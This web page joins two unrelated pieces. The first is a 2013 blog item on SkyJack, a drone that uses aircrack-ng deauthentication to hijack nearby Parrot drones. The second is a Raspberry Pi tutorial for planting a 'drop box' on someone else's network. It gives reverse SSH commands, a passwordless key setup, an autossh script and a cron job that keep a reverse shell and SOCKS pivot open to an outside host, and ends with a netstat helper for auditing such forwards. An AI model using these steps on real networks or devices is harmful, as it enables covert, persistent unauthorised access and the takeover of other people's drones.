SkyJack: A Drone to Hack All Drones

December 6, 2013 by Josh Marsh

Quadcopters are gradually becoming more affordable and thus more popular; we expect more kids will unwrap a prefab drone this holiday season than any year prior. [Samy’s] got plans for the drone-filled future. He could soon be the proud new owner of his own personal army now that he’s built a drone that assimilates others under his control.

The build uses a Parrot AR.Drone 2.0 to fly around with an attached Raspberry Pi, which uses everybody’s favorite Alfa adapter to poke around in promiscuous mode. If the SkyJack detects an IEEE-registered MAC address assigned to Parrot, aircrack-ng leaps into action sending deauthentication requests to the target drone, then attempts to take over control while the original owner is reconnecting. Any successfully lassoed drone doesn’t just fall out of the sky, though. [Samy] uses node-ar-drone to immediately send new instructions to the slave.

You can find all his code on GitHub, but make sure you see the video below, which gives a thorough overview and a brief demonstration. There are also a few other builds that strap a Raspberry Pi onto a quadcopter worth checking out; they could provide you with the inspiration you need to take to the skies.

Reverse SSH Shell – Raspberry Pi Recipes



SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)

In this section I’ll cover setting up a Raspberry Pi to send you a reverse shell using SSH (AKA “shovel a shell”). This is pretty good for blowing past NAT and some firewalls with weak egress filtering. The idea is that you can use these as drop boxes to leave behind on someone else’s network, then have them remote back out to you. These instructions should work pretty much the same on any *nix device or distro that uses OpenSSH. Make sure you have OpenSSH installed; most distros I’ve seen do.

  • These are the non-automated commands to do a reverse SSH connection and set up a proxy/pivot using OpenSSH. On the Raspberry Pi, use the following command:

        ssh -R 1974:localhost:22 root@some-pc-client

  • On the PC (it must have an SSH server running):

        ssh -D 1080 -p 1974 pi@localhost

The first command asks the PC’s SSH server to listen on its port 1974 and forward anything that connects there back to port 22 on the Raspberry Pi. The second command connects through that forward and also opens a SOCKS port (1080) on your local PC that you can use to tunnel traffic into the Raspberry Pi’s network.

Automating it

OK, the commands above were just to do it manually; how about automating the shell shoveling? I based my work on Brandon Hutchinson’s script for automating the SSH reverse connection every 5 minutes, so check out his site.

Here are the steps:
1. SSH Keys Setup
Do the following on the Raspberry Pi, but replace “root” with the username on your home PC (I use in these examples):

        ssh-keygen -t rsa

Use a blank passphrase. This next line copies the key to the PC:

        cat ~/.ssh/ | ssh root@some-pc-client "cat - >> ~/.ssh/authorized_keys"

2. Reverse SSH Automatic Script
Make a script called “autossh” on the Raspberry Pi with the contents of this script, replacing the parameter values (host, username and port) as needed:


        #!/bin/sh
        # Based on Brandon Hutchinson's reverse SSH script

        # $REMOTE_HOST is the name of the remote system
        REMOTE_HOST=some-pc-client

        # Setting my username for home box, you will most likely want to change this
        REMOTE_USER=root

        # $REMOTE_PORT is the remote port number that will be used to tunnel
        # back to this system
        REMOTE_PORT=1974

        # $COMMAND is the command used to create the reverse ssh tunnel
        # (-N: no remote command, just the forward; -q: quiet)
        COMMAND="ssh -q -N -R $REMOTE_PORT:localhost:22 $REMOTE_USER@$REMOTE_HOST"

        # Is the tunnel up? Perform two tests:

        # 1. Check for relevant process ($COMMAND); start it if it is not running
        pgrep -f -x "$COMMAND" > /dev/null 2>&1 || $COMMAND

        # 2. Test tunnel by looking at "netstat" output on $REMOTE_HOST
        ssh $REMOTE_USER@$REMOTE_HOST netstat -an | egrep "tcp.*:$REMOTE_PORT.*LISTEN" \
            > /dev/null 2>&1

        if [ $? -ne 0 ] ; then
            # The ssh process exists but the remote port is not listening:
            # kill the stale tunnel and bring up a fresh one
            pkill -f -x "$COMMAND"
            $COMMAND
        fi

and set it as executable with:

        chmod 755 autossh

3. Use the “crontab -e” command on your Raspberry Pi to schedule the script to run every 5 minutes. The entry will be something like:

        */5 * * * * /home/pi/autossh

4. Now go to your home PC and you should be able to use this command to connect to the waiting shell:

        ssh -D 1080 -p 1974 pi@localhost

Use port 1080 on the localhost for tools that will work with a SOCKS proxy and tunnel traffic into the remote network.
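As an added example (not part of the recipe above), the POSIX shell functions below tighten the recipe’s netstat check and show what a reverse forward looks like from the receiving PC’s side, which is where an administrator auditing that host would spot it. The netstat output is constructed sample data and the function names are my own.

```shell
#!/bin/sh
# Constructed sample of "netstat -an" as seen on the home PC while a
# "-R 1974:localhost:22" forward is up: sshd binds 127.0.0.1:1974 for it.
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:1974          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:19740         0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.10:22         198.51.100.7:41022      ESTABLISHED'

# Exit 0 only if TCP port $1 is in LISTEN state in the netstat text on stdin.
# The recipe's pattern "tcp.*:$PORT.*LISTEN" also matches port 19740 when
# PORT=1974; requiring whitespace right after the port fixes that.
# "[:.]" accepts both Linux (addr:port) and BSD (addr.port) separators.
tunnel_listening() {
    grep -Eq "^tcp[[:space:]].*[:.]$1[[:space:]].*LISTEN"
}

# Print the ports that are listening on the loopback address only.
# On the receiving host, every "-R" forward shows up as exactly this,
# so unexplained entries here are what to review when auditing the box.
loopback_listeners() {
    awk '$1 == "tcp" && $6 == "LISTEN" && $4 ~ /^127\.0\.0\.1:/ {
            split($4, a, ":"); print a[2] }'
}

# Demonstration when run directly
echo "$SAMPLE_NETSTAT" | tunnel_listening 1974 && echo "port 1974 forward is up"
echo "$SAMPLE_NETSTAT" | tunnel_listening 197 || echo "port 197 is not listening"
echo "Loopback-only listeners:"
echo "$SAMPLE_NETSTAT" | loopback_listeners
```

On a live system feed the functions real output (`netstat -an | tunnel_listening 1974`) instead of the sample string.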


